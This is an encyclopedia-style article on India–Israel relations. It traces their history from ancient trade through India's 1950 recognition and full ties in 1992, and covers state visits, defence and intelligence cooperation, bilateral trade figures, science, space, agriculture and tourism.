The trade relations of both communities can be traced back to 1,000 BCE and earlier to the time of the Indus valley civilization of the Indian subcontinent and the Babylonian culture of Middle East. A Buddhist story describes Indian merchants visiting Baveru (Babylonia) and selling peacocks for public display. Similar, earlier accounts describe monkeys exhibited to the public. Trade connections between India and Palestine and Mediterranean Jewish communities continued, and later, the languages of these cultures started to share linguistic similarities.
Judea played a minor role in trade between the Roman Empire and India during the period of Roman rule in Judea. It is known that there were expensive garments in the Temple in Jerusalem imported from India via Alexandria.
Non-recognition period (1948–1950)
India's position on the establishment of the State of Israel was affected by many factors, including India's own partition on religious lines, and India's relationship with other nations. Indian independence leader Mahatma Gandhi believed the Jews had a good case and a prior claim for Israel, but opposed the creation of Israel on religious or mandated terms. Gandhi believed that the Arabs were the rightful occupants of Palestine, and was of the view that the Jews should return to their countries of origin. Albert Einstein wrote a four-page letter to Jawaharlal Nehru on June 13, 1947, to persuade India to support the setting up of a Jewish state. Nehru, however, couldn’t accept Einstein’s request, and explained his dilemma stating that national leaders have to “unfortunately” pursue policies that are “essentially selfish”. India voted against the Partitioning of Palestine plan of 1947 and voted against Israel's admission to the United Nations in 1949. Various proponents of Hindu nationalism supported or sympathised with the creation of Israel. Hindu Mahasabha leader Vinayak Damodar Savarkar supported the creation of Israel on both moral and political grounds, and condemned India's vote at the UN against Israel. Rashtriya Swayamsevak Sangh leader Madhav Sadashiv Golwalkar admired Jewish nationalism and believed Palestine was the natural territory of the Jewish people, essential to their aspiration for nationhood.
Informal recognition (1950–1991)
On 17 September 1950, India officially recognised the State of Israel. Following India's recognition of Israel, Indian Prime Minister Jawaharlal Nehru stated, "we would have [recognised Israel] long ago, because Israel is a fact. We refrained because of our desire not to offend the sentiments of our friends in the Arab countries." In 1953, Israel was permitted to open a consulate in Bombay (now Mumbai). However, the Nehru government did not want to pursue full diplomatic relations with Israel as it supported the Palestinian cause, and believed that permitting Israel to open an embassy in New Delhi would damage relations with the Arab world.
From India's recognition of Israel in 1950 to the early 1990s, the relationship remained informal in nature. Israel supported India during the Indo-Pakistani War of 1971. India's opposition to official diplomatic relations with Israel stemmed from both domestic and foreign considerations. Domestically, politicians in India feared losing the Muslim vote if relations were normalised with Israel.
Additionally, India did not want to jeopardise the large amount of its citizens working in Arab States of the Persian Gulf, who were helping India maintain its foreign-exchange reserves. India's domestic need for energy was another reason for the lack of normalisation of ties with Israel, in terms of safeguarding the flow of oil from Arab nations. India's foreign policy goals and alliances also proved problematic to formal relations with Israel, including India's support for the pro-Palestine Liberation Organization Non-Aligned Movement, India's tilt towards the Soviet Union during the Cold War, and India's desire to counter Pakistan's influence with the Arab states. On an ideological level, the dominant political party in India during this era, namely the Indian National Congress, opposed Israel due to their perception that it was a state based on religion, analogous to Pakistan.
Although there was no formal relationship for several decades, meetings and cooperation took place between both countries, including figures such as Moshe Dayan. Israel also provided India with crucial information during its multiple wars.
Rapprochement and full recognition (1992–present)
After decades of non-aligned and pro-Arab policy, India formally established relations with Israel when it opened an embassy in Tel Aviv in January 1992. Ties between the two nations have flourished since, primarily due to common strategic interests and security threats. In 1999, Israel supported India in the Kargil War by providing arms and ammunition. The formation of the Organisation of Islamic Cooperation (OIC), which allegedly neglected the sentiments of Indian Muslims, and Pakistan's blocking of India from joining the OIC, are considered to be causes of this diplomatic shift. On a diplomatic level, the two countries have managed to maintain healthy relations despite India's repeated strong condemnations of Israeli military actions in the Palestinian territories, which analysts believe were motivated by the United Progressive Alliance (UPA) government's desire for Muslim votes in India.
At the height of the tension between Israel and Hamas in July 2014, India issued a rhetorical condemnation holding both sides responsible for the eruption of violence and asked Israel to stop the "disproportionate use of force" in Gaza, which many read as a departure from the tradition of more vocal support for the Palestinian cause. External Affairs Minister Sushma Swaraj insisted that "there is absolutely no change in India's policy towards Palestine, which is that we fully support the Palestinian cause while maintaining good relations with Israel", clarifying India's position on the issue. While that might sound to some like fence-sitting, it is a policy shared by all Indian governments over the 20 years following the establishment of formal diplomatic relations in 1992. Swaraj, a seasoned parliamentarian, had herself blocked an opposition demand in the Rajya Sabha for a resolution condemning Israel over the 2014 Israel–Gaza conflict, saying that "India has friendly relation with both Israel and Palestine and therefore any such move may impact its friendship negatively". Later, in a symbolic gesture, India joined the other BRICS nations in voting at the United Nations Human Rights Council for a probe into alleged human rights violations in Gaza, which generated a mixed response among media and analysts in India. When the UNHRC report alleging that Israel had committed war crimes was tabled for a vote, India abstained, one of five countries to do so; 41 nations voted in favour, and the United States cast the only vote against. Israeli envoy to India Daniel Carmon thanked India for not supporting what he described as "another anti Israel bashing resolution".
The India–Israel relationship has been very close and warm under the premiership of Narendra Modi since 2014. In 2017, he became the first Indian Prime Minister to visit Israel. India was the largest arms customer of Israel in 2017. Defence relations between the two countries are longstanding.
India voted in favour of Israel's resolution to deny observer status to Palestinian non-governmental organization Shahed at the UN Economic and Social Council (ECOSOC) on 6 June 2019.
Diplomatic visits
1997
Ezer Weizman became the first Israeli President to visit India in 1997.
2000
In 2000, L. K. Advani became the first Indian minister to visit the State of Israel.
Later that year, Jaswant Singh became the first Indian Foreign Minister to visit Israel. Following the visit, the two countries set up a joint anti-terror commission. The foreign ministers of the two countries said intensified co-operation would range from counter-terrorism to information technology.
2003
In 2003, Ariel Sharon was the first Israeli Prime Minister to visit India. He was welcomed by the Bharatiya Janata Party (BJP) led National Democratic Alliance coalition government of India. Several newspapers expressed positive views on his visit, and Indian Prime Minister Atal Bihari Vajpayee voiced confidence that Sharon's visit would pave the way for further consolidating bilateral ties. Sharon's visit was condemned in leftist and Muslim circles. Hundreds of supporters of India's various communist parties rallied in New Delhi while nearly 100 Muslims were arrested in Mumbai. Students of Aligarh Muslim University demanded that India sever ties with Israel and increase ties with Palestine. The Hindi-language daily Navbharat Times called Sharon "an important friend of India." The Hindu nationalist Rashtriya Swayamsevak Sangh (RSS) condemned the protest against Sharon. Sharon expressed satisfaction over his talks with Indian leaders. Indian Prime Minister Atal Bihari Vajpayee said the visit would increase ties between India and Israel. Sharon invited Vajpayee to visit Israel. Sharon said that Israelis "regard India to be one of the most important countries in the world," and Vajpayee was sure that Sharon's visit would bring the two countries closer together.
2006
In early 2006 Indian government ministers Sharad Pawar, Kapil Sibal and Kamal Nath visited Israel. Gujarat Chief Minister, Narendra Modi visited Israel in October 2006.
2012
Despite "India's unwavering support for the Palestinian cause", Foreign Minister SM Krishna made a two-day visit to Israel in 2012. The Israeli PM deemed this visit by Krishna a historical step forward in developing the relations between the two nations.
2014
In May 2014, after Narendra Modi's victory in the 2014 general election, Israeli PM Benjamin Netanyahu personally congratulated him. Modi in turn met Netanyahu in New York City on the sidelines of the UN General Assembly during his US visit in 2014. This was the first meeting between the Prime Ministers of the two countries in over a decade. On the occasion of the Hanukkah festival, Modi greeted his Israeli counterpart in Hebrew on Twitter, while the Israeli PM replied in Hindi.
Indian Home Minister Rajnath Singh visited Israel in November 2014 to observe the country's border security arrangements, and during his tour also met Israeli PM Netanyahu. Breaking from convention, Singh was the first Indian minister to visit Israel without also visiting Palestine on the same trip. In the same year, former Israeli President Shimon Peres visited India, and a high-level Israeli delegation led by Agriculture Minister Yair Shamir participated in the Vibrant Gujarat summit in 2015. In December 2014, The Hindu published a news article stating that "India may end support to Palestine at UN".
2015
In February 2015, Israeli Defence Minister Moshe Ya'alon visited India, where he participated in Aero India 2015 and met his Indian counterpart as well as the Indian PM. Pranab Mukherjee became the first President of India to visit Israel, from October 13 to 15, 2015. Mukherjee was given the rare honour of addressing the Knesset.
2016
Foreign Minister Sushma Swaraj visited Israel in January 2016. During the visit, she visited the Yad Vashem Holocaust Memorial in Jerusalem, and met with Prime Minister Benjamin Netanyahu, President Reuven Rivlin, members of the cabinet, and the Indian Jewish communities in Israel.
In September 2016, Indian Minister of Agriculture Radha Mohan Singh visited Israel to bolster India–Israel agricultural ties. He met his Israeli counterpart, Uri Ariel, to discuss collaborative opportunities in agriculture between the two countries.
Israeli President Reuven Rivlin visited India for a week-long state visit in November 2016, becoming the second Israeli President to visit the country. Rivlin visited New Delhi, Agra, Karnal, Chandigarh and Mumbai. He spent the last day of his visit in Mumbai paying homage to the victims of the 2008 Mumbai attacks and meeting with the Indian Jewish community. Israel regards Iran as a major threat to its national security, and Rivlin expressed this concern in meetings with Prime Minister Modi. Following his visit, Rivlin told Israeli media that the Indian government had assured him that India would support Israel despite its growing economic ties with Iran. Rivlin told The Jerusalem Post, "They assure us that when the time will come they will never, never, ever let anyone [act against] the existence of Israel."
Official state visits
Narendra Modi's visit to Israel (2017)
In July 2017, Narendra Modi became the first Indian Prime Minister to visit Israel. It was noted that Modi did not visit Palestine during the trip, breaking from convention: with the sole exception of Union Minister Rajnath Singh, previous trips by Indian ministers and President Mukherjee had included visits to both Israel and Palestine. The Indian media described the move as the "dehyphenation" of India's relations with the two states.
As a personal gesture, Israel named a new type of chrysanthemum flower after Narendra Modi. Media houses in both countries termed the visit 'historic', saying India had finally brought its relations with Israel out of the closet. During the visit, India and Israel signed seven MoUs, listed below:
MoU for setting up of India-Israel Industrial Research and Development and Technological Innovation Fund (I4F)
MoU for Water Conservation in India
MoU on State Water Utility Reform in India
India-Israel Development Cooperation – 3-year work program in Agriculture 2018–2020
Plan of cooperation regarding atomic clocks
MoU regarding cooperation in GEO-LEO optical link
MoU regarding cooperation in Electric Propulsion for Small Satellites
India and Israel also signed an agreement upgrading their bilateral relations to a 'strategic partnership'. During the trip, Prime Minister Modi also addressed the Indian diaspora in Israel in a highly televised event in Tel Aviv. As a gesture of welcome from their homeland, he announced Overseas Citizenship of India cards for Jews of Indian origin who had completed their compulsory military service in the Israel Defense Forces, and pledged the construction of a major Indian cultural centre in Tel Aviv. Modi also visited the northern Israeli city of Haifa, where he paid homage to the Indian Army soldiers who fell in the Battle of Haifa and unveiled a plaque commemorating the military leadership of Major Dalpat Singh, who led the capture of the ancient city from the Ottoman Empire.
Benjamin Netanyahu's visit to India (2018)
In January 2018, to commemorate 25 years of India–Israel relations, Israeli Prime Minister Benjamin Netanyahu made a widely televised visit to India, during which he and Prime Minister Modi exchanged warm praise. This was the first visit by an Israeli Prime Minister since Ariel Sharon's trip in 2003. Netanyahu was accompanied by a 130-member delegation, the largest ever to accompany a visiting Israeli premier, and sought to increase Israeli exports to India by 25 percent over three years. Israel was to invest $68.6 million in areas such as tourism, technology, agriculture and innovation over a period of four years, a senior Israeli official said ahead of the visit.
During this visit, an official commemoration ceremony honoured the Indian soldiers who perished in the Battle of Haifa during World War I; Teen Murti Chowk, representing the Hyderabad, Jodhpur and Mysore lancers, was renamed 'Teen Murti Haifa Chowk' after the Israeli port city of Haifa. The two countries signed nine MoUs in the fields of cybersecurity, oil and gas production, air transport, homeopathic medicine, film production, space technology and innovation, and Netanyahu also met with the heads of the Bollywood film industry. The visit also included an effort to revive a missile deal with Israel's Rafael for New Delhi. Netanyahu was the guest of honour and delivered the inaugural address at India's annual strategic and diplomatic conference, the Raisina Dialogue, where he highlighted various aspects of Israel's success as a high-tech, innovation-based economy, spoke about the challenges plaguing the Middle East, and expressed optimism about the future of his country's relations with India. Notable leaders who attended included Narendra Modi, Sushma Swaraj, former Afghan President Hamid Karzai, Indian Minister of State M. J. Akbar, and Indian National Congress leader Shashi Tharoor. Netanyahu's son Yair was expected to accompany him on the state visit, but a week before the trip a recording of Yair's private visit to a strip club with friends was disclosed on an Israeli television news broadcast.
Military and strategic ties
New Delhi found in Israel's defence industry a useful source of weapons, one that could supply it with advanced military technology. This established the basis of a burgeoning arms trade, which reached almost $600 million in 2016, making Israel the second-largest source of defence equipment for India, after Russia.
India and Israel have increased co-operation in military and intelligence ventures since the establishment of diplomatic relations. The rise of Islamic extremist terrorism in both nations has generated a strong strategic alliance between the two. In 2008, India launched an Israeli military satellite, TecSAR, through the Indian Space Research Organisation.
In 1996, India purchased 32 IAI Searcher unmanned aerial vehicles (UAVs), Electronic Support Measure sensors and an Air Combat Manoeuvering Instrumentation simulator system from Israel. Since then Israel Aerospace Industries (IAI) has serviced several large contracts with the Indian Air Force including the upgrading of the IAF's Russian-made MiG-21 ground attack aircraft and there have been further sales of unmanned aerial vehicles as well as laser-guided bombs.
In 1997, Israel's President Ezer Weizman became the first head of the Jewish state to visit India. He met with Indian President Shankar Dayal Sharma, Vice President K. R. Narayanan and Prime Minister H. D. Deve Gowda. Weizman negotiated the first weapons deal between the two nations, involving the purchase of Barak 1 vertically-launched surface-to-air missiles (SAMs) from Israel. The Barak-1 has the ability to intercept anti-ship missiles such as the Harpoon. The purchase of the Barak-1 missiles was a tactical necessity for India, since Pakistan had purchased Lockheed P-3 Orion maritime surveillance aircraft and 27 Harpoon sea-skimming anti-ship missiles from the United States. Israel was one of the few nations, along with France and Russia, that did not condemn India's 1998 Pokhran-II nuclear tests.
In 1999, Israel supported India in the Kargil War by providing arms and ammunition.
In 2000, Israeli submarines reportedly conducted test launches of cruise missiles capable of carrying nuclear warheads in the waters of the Indian Ocean, off the Sri Lankan coast. In naval terms, Israel sees great strategic value in an alliance with the Indian Navy, given India's naval dominance of South Asian waters and the Indian Ocean at large. Owing to the great importance of maritime trade to its economy, Israel sees potential in establishing a logistical infrastructure in the Indian Ocean with the help of the Indian Navy.
India purchased three Phalcon AWACS, fitted with IAI radar equipment mounted on Russian IL-76 transport aircraft, in 2003 at a cost of $1 billion.
India purchased 50 Israeli drones for $220 million in 2005. India was considering buying the newer Harop drone. India is also in the process of obtaining missile-firing Hermes 450s.
Israel Aerospace Industries Ltd signed a US$2.5 billion deal with India in 2007 to develop an anti-aircraft system and missiles for the country, in the biggest defence contract in the history of Israel at the time. IAI CEO Yitzhak Nissan visited India to finalise the agreement with heads of the defence establishment and the country's president. IAI is developing the Barak 8 missile for the Indian Navy and Indian Air Force which is capable of protecting sea vessels and ground facilities from aircraft and cruise missiles. The missile has a range of over 70 kilometres. The missile will replace the current obsolete Russian system used by India.
On 10 November 2008, Indian military officials visited Israel to discuss joint weapons development projects, additional sales of Israeli equipment to the Indian military, and anti-terrorism strategies. The new round of talks was seen as a significant expansion in the Indian-Israeli strategic partnership.
Following the 2008 Mumbai attacks, Israel offered a team of about 40 special-operations forces and assistance in investigations. Tzipi Livni said: "If they need us we will help where needed". Magen David Adom dispatched a team of paramedics, medics and other professionals to assist with rescue efforts in the wake of the attacks. Israeli newspapers reported that the Manmohan Singh government turned down an offer by Defense Minister Ehud Barak to send counter-terrorist units to help fight the attackers.
In December 2009, Lt Gen Gabi Ashkenazi, Chief of Staff of the Israel Defense Forces, made a visit to India to cement the defence ties between the two countries. He pledged every help to India in fighting terrorism.
In March 2011, it was reported that India would buy 8356 Israeli Spike anti-tank missiles, 321 launchers, 15 training simulators and peripheral equipment, for $1 billion, from Israel's Rafael Advanced Defense Systems. The deal was finalised by Prime Minister Narendra Modi after coming into office.
In September 2015, the Indian government approved the air force's request to purchase 10 Heron TP drones from Israel Aerospace Industries (IAI). In 2015, a delegation from Israel's Jerusalem Center for Public Affairs visited India, led by former Israeli ambassador to the United Nations Dore Gold. Shared strategic interests were discussed, including combatting radical Islam, the handling of territorial disputes, and the security situation in West Asia/the Middle East and South Asia.
In October 2015, The Pioneer reported that India and Israel were planning to hold their first joint military exercise. The date and location were not announced.
In September 2016, the Indian government approved the purchase of two more Phalcon AWACS.
In 2017, the countries signed a military agreement worth US$2 billion.
In 2017, India participated for the first time in the Blue Flag exercise at Uvda Air Force Base in southern Israel, deploying its elite Garud Commando Force and a Hercules C-130J aircraft from its "Veiled Vipers" squadron. Indian and Israeli special forces conducted a range of joint tactical exercises, including protection of strategic assets, ground infiltration and evacuation.
The Indian Air Force sent five Dassault Mirage 2000 fighter aircraft to participate in Blue Flag 2021.
The Defence Research and Development Organisation (DRDO) and the Directorate of Defence Research and Development (DDR&D) signed a Bilateral Innovation Agreement on 9 November 2021. The agreement facilitates the joint production of defence technology such as drones, robotics, artificial intelligence, quantum technology and other areas. Production will be jointly funded by both agencies and all technologies developed under the agreement will be available for use by both India and Israel.
Intelligence-sharing cooperation
When the Research and Analysis Wing (RAW) was founded in September 1968 by Rameshwar Nath Kao, he was advised by then Prime Minister Indira Gandhi to cultivate links with Mossad. This was suggested as a countermeasure to Pakistan's military links with China and North Korea. Israel was also concerned that Pakistani army officers were training Libyans and Iranians in handling Chinese and North Korean military equipment.
Pakistan believed intelligence relations between India and Israel threatened Pakistani security. When young Israeli tourists began visiting the Kashmir valley in the early 1990s, Pakistan suspected they were disguised Israeli army officers there to help Indian security forces with anti-terrorism operations. Israeli tourists were attacked, with one slain and another kidnapped. Pressure from the Kashmiri Muslim diaspora in the United States led to the kidnapped tourist's eventual release, as Kashmiri Muslims feared that the attacks could alienate the American Jewish community and result in it lobbying the US government against Kashmiri separatist groups.
A Rediff story in 2003 revealed clandestine links between R&AW and Mossad. In 1996, R.K. Yadav, a former RAW official had filed a disproportionate assets case in the Delhi High Court against Anand Kumar Verma, RAW chief between 1987 and 1990. Yadav listed eight properties that he claimed were purchased illegally by Verma using RAW's unaudited funds for secret operations. Although his petition for a CBI inquiry into Verma's properties was dismissed, Yadav managed to obtain more information through a right to information request in 2005 and filed another case in 2009. In 2013, the CBI carried out an investigation of Verma's properties. Proceedings in the Delhi High Court revealed the names of two companies floated by RAW in 1988 – Piyush Investments and Hector Leasing and Finance Company Ltd. The firms were headed by two senior RAW officials V. Balachandran and B. Raman. Balachandran and Raman retired in 1994 and 1995 respectively. The companies were listed as trading houses that dealt in several kinds of minerals, automobiles, textiles, metals and spare parts, and also claimed to produce feature films. The companies purchased two flats in Gauri Sadan, a residential building on Hailey Road, New Delhi in March 1989 for 23 lakh.
India Today reported that the two flats were RAW safe houses used as operational fronts for Mossad agents and housed Mossad's station chief between 1989 and 1992. RAW had reportedly decided to have closer ties to Mossad, and the subsequent secret operation was approved by then Prime Minister Rajiv Gandhi. India Today cites "RAW insiders" as saying that RAW agents hid a Mossad agent holding an Argentine passport and exchanged intelligence and expertise in operations, including negotiations for the release of an Israeli tourist kidnapped by Jammu and Kashmir Liberation Front militants in June 1991. When asked about the case, Verma refused to speak about the companies, but claimed his relationship with them was purely professional. Raman stated, "Sometimes, spy agencies float companies for operational reasons. All I can say is that everything was done with government approval. Files were cleared by the then prime minister [Rajiv Gandhi] and his cabinet secretary." Balachandran stated, "It is true that we did a large number of operations but at every stage, we kept the Cabinet Secretariat and the prime minister in the loop."
In November 2015, The Times of India reported that agents from Mossad and MI5 were protecting Prime Minister Narendra Modi during his visit to Turkey. Modi was on a state visit to the United Kingdom and was scheduled to attend the 2015 G-20 Summit in Antalya, Turkey. The paper reported that the agents had been called in to provide additional cover to Modi's security detail, composed of India's Special Protection Group and secret agents from RAW and IB, in wake of the November 2015 Paris attacks.
On 14 February 2019, a convoy of vehicles carrying security personnel on the Jammu–Srinagar National Highway was attacked by a vehicle-borne suicide bomber at Lethpora in the Pulwama district of Jammu and Kashmir, India. Forty Central Reserve Police Force personnel were killed in the attack. Israel offered "unconditional support" to the Indian Army and the government, and said it would share intelligence and technology to help India respond.
Bilateral trade
Bilateral trade between India and Israel grew from $200 million in 1992 to $4.52 billion in 2014. As of 2014, India is Israel's tenth-largest trade partner and import source, and seventh-largest export destination. India's major exports to Israel include precious stones and metals, organic chemicals, electronic equipment, plastics, vehicles, machinery, engines, pumps, clothing and textiles, and medical and technical equipment. Israel's imports from India amounted to $2.3 billion or 3.2% of its overall imports in 2014. Israel's major exports to India include precious stones and metals, electronic equipment, fertilisers, machines, engines, pumps, medical and technical equipment, organic and inorganic chemicals, salt, sulphur, stone, cement, and plastics. Israeli exports to India amounted to $2.2 billion or 3.2% of its overall exports in 2014. The two countries have also signed a 'Double Taxation Avoidance Agreement'.
In 2007, Israel proposed starting negotiations on a free trade agreement with India, and in 2010, then Indian Prime Minister Manmohan Singh accepted that proposal. The agreement is set to focus on many key economic sectors, including information technology, biotechnology, water management, pharmaceuticals, and agriculture. In 2013, then Israeli Minister of Economy Naftali Bennett projected a doubling of trade from $5 to $10 billion between the two countries, if a free trade agreement was successfully negotiated. As of 2015, negotiations on a free trade agreement continue, with both countries considering negotiating a more narrow free trade agreement on goods, followed by separate agreements on trade in investment and services.
During the coronavirus pandemic, on 9 April 2020, India exported to Israel a five-ton shipment of drugs and chemicals. The consignment included ingredients for the drugs hydroxychloroquine and chloroquine. On this occasion, Sanjeev Singla, India's ambassador to Israel, stressed the bilateral ties between the two countries. In March 2020, Prime Minister Benjamin Netanyahu had asked Modi to exempt Israel from India's export ban on raw materials used to make medicines for treating coronavirus patients. Israel later sent life-saving equipment, including oxygen generators and respirators, to India to assist it in the fight against the coronavirus.
The 10 major commodities exported from India to Israel were:
Gems, precious metals and coins: $973.6 million
Organic chemicals: $296.5 million
Electronic equipment: $121.2 million
Medical, technical equipment: $59.3 million
Plastics: $56.4 million
Vehicles: $44.4 million
Machinery: $38.1 million
Other textiles, worn clothing: $31.8 million
Knit or crochet clothing: $31.6 million
Clothing (not knit or crochet): $30.8 million
Israeli exports to India amounted to $2.3 billion or 3.8% of its overall exports in 2015. The 10 major commodities exported from Israel to India were:
Gems, precious metals and coins: $933.7 million
Electronic equipment: $389.3 million
Medical, technical equipment: $180.7 million
Iron or steel products: $170.3 million
Fertilisers: $157 million
Machinery: $110.9 million
Organic chemicals: $69.8 million
Other chemical goods: $44.2 million
Inorganic chemicals: $43.6 million
Plastics: $29.5 million
Science and technology collaboration
In 1993, during the visit to India of then Israeli Foreign Minister Shimon Peres, India and Israel signed an agreement on science and technology, which allowed for direct scientific cooperation between both governments. Specific areas of cooperation included information technology, biotechnology, lasers, and electro-optics. Additionally, a joint committee to monitor collaboration between the two nations was established and set to meet biennially. In 1994, a $3 million joint science and technology fund was set up to facilitate R&D collaboration between both countries.
In 1996, Indian scientists attended a seminar on advanced materials in Israel. In 1997, Israeli scientists attended a seminar on biotechnology in Delhi. In 1998, India and Israel had 22 ongoing joint research projects. A joint symposium on the human genome was held in Jerusalem, where six Indian scientists took part. In November 1999, India and Israel agreed on four proposals for joint research projects in the field of human genome research. In 2000, even more joint projects related to human genome research were agreed on, and a status seminar on this field was held in India. In early 1999, more than 20 Israeli scientists participated in a physics symposium on condensed matter in Delhi. In 2001, a similar symposium was held in Jerusalem, with 18 Indian scientists attending.
In 2003, both countries discussed doubling their investment in their ongoing science and technology collaboration to $1 million each, starting in October 2004. In 2005, India and Israel signed a memorandum of understanding to set up a fund to encourage bilateral investment into industrial research and development and specific projects. Under the agreement, at least one Indian and one Israeli company must be collaborating on a project for that project to qualify for the fund. From 2006 to 2014, the fund, named i4RD, has been used in seven projects. In 2012, the two countries signed a five-year $50 million academic research agreement for promoting collaborative research across a wide range of disciplines, including medical and information technology, social and life sciences, humanities, and the arts.
In 2012, Israel stated its intent to increase technological and economic cooperation with the Indian state of Bihar, in the fields of agriculture, water management, solar energy, and medical insurance. In 2014, Israel made plans to open two agricultural centers of excellence in Bihar, focusing on increasing productivity of vegetable and mango crops.
Israel has offered to help the Indian government with a project to clean the Ganga. An Israeli delegation visited India in August 2015 and met with officials of the Union Ministry of Water Resources, River Development and Ganga Rejuvenation. Israeli Ambassador to India Daniel Carmon also called on Union Urban Development and Parliamentary Affairs Minister M. Venkaiah Naidu to offer Israel's expertise in water management to battle water scarcity. Ohad Horsandi, spokesperson of the Israeli Embassy in New Delhi, stated that Israel was keen to help India meet its water needs for agriculture and drinking, and was pushing for more government-to-government agreements.
Following Prime Minister Modi's visit to Israel in 2017, there have been increased calls for collaboration between Israel and India on innovation. The India-based non-profit global trade body NASSCOM, along with the professional services company Accenture, released the report Collaborative Innovation: The Vehicle Driving Indo-Israel Prosperity, highlighting areas of scientific and technological collaboration between the two countries. Additionally, the non-profit organization TAVtech Ventures is launching a program that connects students from Israel and the United States with local Indian students to develop tech-based startups.
Space collaboration
In 2002, India and Israel signed a cooperative agreement promoting space collaboration between both nations.
In 2003, the Israel Space Agency, or ISA, expressed interest in collaborating with the Indian Space Research Organisation, or ISRO, in using satellites for improved management of land and other resources. Israel also expressed interest in participating in ISRO's proposed mission of sending an unmanned craft to the moon. Additionally, the two countries signed an agreement outlining the deployment of TAUVEX, an Israeli space telescope array, on India's GSAT-4, a planned navigation and communication satellite. In 2010, the TAUVEX array was removed from GSAT-4 by the ISRO, and the array was never subsequently launched. The GSAT-4 itself failed to launch, due to the failure of its cryogenic engine.
In 2005, Israel decided to launch TecSAR, its first synthetic aperture radar imaging satellite, on India's Polar Satellite Launch Vehicle, or PSLV. TecSAR was chosen to launch through India's PSLV due to Israeli concerns about the reliability and technical limitations of its own Shavit space launch vehicle, economic considerations, and also due to Israel's desire to increase strategic cooperation with India. In 2008, TecSAR was successfully inserted into orbit by India's PSLV. One of TecSAR's primary functions is to monitor Iran's military activities.
In 2009, India successfully launched RISAT-2, a synthetic aperture radar imaging satellite. RISAT-2 was manufactured by Israel Aerospace Industries, or IAI, in conjunction with ISRO. The launch of the RISAT-2 satellite aimed to provide India with greater earth observation power, which would improve disaster management, and increase surveillance and defense capabilities. The acquisition and subsequent launch of the RISAT-2 satellite was accelerated after the 2008 Mumbai attacks, to boost India's future surveillance capabilities.
Agriculture collaboration
India has chosen Israel as a government-to-government (G2G) strategic partner in the field of agriculture. This partnership evolved into the Indo-Israel Agricultural Project (IIAP) under the Indo-Israel Action Plan, based on an MoU signed by the Indian and Israeli ministers of agriculture in 2006. The partnership aims to introduce crop diversity, increase productivity and improve water-use efficiency. The IIAP was initiated in 2009 and is implemented through the establishment of Centres of Excellence (CoEs), in which Israeli technologies and know-how are disseminated after being tailored to local Indian conditions. Three phases of the IIAP have been carried out to date, each lasting three years (2009–2012, 2012–2015 and 2015–2018). Across the 16 states invited to take part in the IIAP, 22 CoEs are currently fully active.
Acknowledging the success of the MIDH-MASHAV IIAP programme over the preceding decade, a three-year work programme in agriculture for 2018–2020 was signed between India's Ministry of Agriculture and Farmers' Welfare and MASHAV, the development agency of Israel's Ministry of Foreign Affairs. The programme seeks to extend the value chain demonstrated by the fully operational Indo-Israel Centres of Excellence by introducing new components, including the Indo-Israeli Centre of Excellence for Animal Husbandry and Dairying at Hisar. Each Centre of Excellence (CoE) is a platform for transferring knowledge and Israeli agro-technology; its goal is to serve farmers with a focus on a key crop, covering nursery management, cultivation techniques, and irrigation and fertigation.
Also in 2008, Israel and India finalised an agricultural plan introducing crops native to the Middle East and Mediterranean to India, with a particular focus on olives. Subsequently, around 112,000 olive trees were planted in the desert of Rajasthan. In 2014, more than 100 tonnes of olives were produced in Rajasthan.
Oil and natural gas sector cooperation
With the discovery of the Tamar and Leviathan gas fields off the coast of Israel, India has been one of the first countries to bid for an exploration license in order to extract and import natural gas from Israel. India's ONGC Videsh, Bharat PetroResources, Indian Oil and Oil India were awarded an exploration license by the Israeli government, a clear sign of the ongoing diversification in ties between the two countries.
Cultural ties and cross-country perceptions
In 2011, cultural artists and performers from India arrived in Israel to participate in a three-week festival commemorating 20 years of diplomatic relations between the two countries. According to India's then Ambassador to Israel Navtej Sarna, the purpose of the festival was to improve the bilateral relationship between the two countries by facilitating a greater understanding of each other's culture.
According to a 2009 international study commissioned by the Israeli Foreign Ministry, the greatest level of sympathy towards Israel can be found in India, with 58% of Indian respondents showing sympathy towards Israel.
As reported in 2015, opinion polls taken in India showed 70% and above of respondents had favorable views of Israel.
In 2015, the United Nations General Assembly voted unanimously in favour of adopting June 21 as International Yoga Day. In a clear sign of growing affinity between the two countries, the Indian Embassy in Tel Aviv organizes annual yoga day celebrations, where Israelis from all walks of life take part in various yogic exercises. Yoga has proven to be immensely popular in Israel and is a sign of Israel's cultural connection to India.
In 2019, Israel was a country partner at an event scheduled to be held at the central university Jamia Millia Islamia. Israel's involvement was protested by students over its "occupation of Palestine." The university relented and announced that "it would not allow Israeli delegates to take part in events on the campus in future." Some Members of Parliament (MPs) also lent support to the protesting students. The teachers' association at Jamia had protested in 2014 against the Israeli offensive in Gaza, joined by various activists, academics, human rights defenders and members of civil society.
Tourism
Around 40,000 Israelis, many of whom have just finished military service, visit India annually. There are dozens of Chabad-operated community centers in India, where many Israelis celebrate holidays and observe religious traditions. Popular destinations for Israelis include Goa, the Himalayas, Old Manali, Vashisht, Naggar, Kasol, and the villages surrounding Dharamsala. In many of these areas, Hebrew signs on businesses and public transportation are widely noticeable.
The number of tourists from India visiting Israel touched 15,900 in the year 2000. By 2010, the number of tourists had increased to 43,439. In 2014, the number of tourists from India visiting Israel was 34,900. A popular destination for Indian tourists traveling to Israel is Jerusalem. In part of 2010, Indian tourists were the biggest spenders in Israel, spending an average of $1,364 per tourist; the average tourist expenditure in Israel during this time was $1,091.
In 2011, representatives from both countries met in Delhi, and planned to enhance tourism through collaboration in the spheres of destination management and promotion, as well as in manpower development. Plans for tour operators and travel agents in both countries to coordinate were also discussed. In 2015, 600 travel agents from India arrived in Israel for the annual Travel Agents Federation of India conference, and ways to decrease barriers to tourism were discussed. Currently, El Al flies between Tel Aviv and Mumbai, Air India flies between Delhi and Tel Aviv, and Arkia flies between Tel Aviv and Kochi as well as Tel Aviv and Goa.
In March 2018, Air India, operating flight AI139, became the first airline to fly non-stop from New Delhi to Tel Aviv via the airspace of Saudi Arabia, overturning a 70-year ban on overflights to Israel. Air India is currently the only airline in the world to have been given such permission, indicating a behind-the-scenes improvement in relations between Israel and the Arab world. The new flight takes approximately 7 hours, which is 2 hours and 10 minutes shorter than the route flown by El Al from Mumbai to Tel Aviv. The success of the route subsequently prompted the airline to increase the frequency of flights to one per day.
